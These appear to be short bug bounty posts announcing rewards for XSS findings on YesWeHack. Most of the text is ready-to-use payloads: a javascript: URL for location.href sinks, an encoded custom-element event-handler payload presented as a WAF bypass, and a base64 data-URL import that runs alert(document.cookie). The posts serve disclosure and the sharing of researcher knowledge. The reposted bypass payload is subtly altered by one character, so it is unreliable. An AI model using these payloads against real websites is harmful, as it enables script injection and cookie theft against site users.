Just got a reward for a vulnerability submitted on @yeswehack -- Cross-site Scripting (XSS) - DOM (CWE-79).
If you control the scheme of location.href = param, send javascript:alert(document.domain)//.
Sorry, the payload I entered above was incorrect. This is the correct one.
<mctx%2FOnCoNtEnTvIsIbIlItYaUtOsTaTeChAnGe%3Dalert%601%60%09STYLE%3Ddisplay%3Ablock%3Bcontent-visibility%3Aauto>
Just got a reward for a vulnerability submitted on @yeswehack -- Cross-site Scripting (XSS) - Reflected (CWE-79).
Waf bypass:
<mctx%2FOnCoNtEnTvIsIbIlItYaUtOsTaTeChAnGe%3Dalert%601%61%09STYLE%3Ddisplay%3Ablock%3Bcontent-visibility%3Aauto>
Just got a reward for a vulnerability submitted on @yeswehack -- Cross-site Scripting (XSS) - Reflected (CWE-79).
wafbypass tips : "-import(%27data:application/javascript;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==%27)-"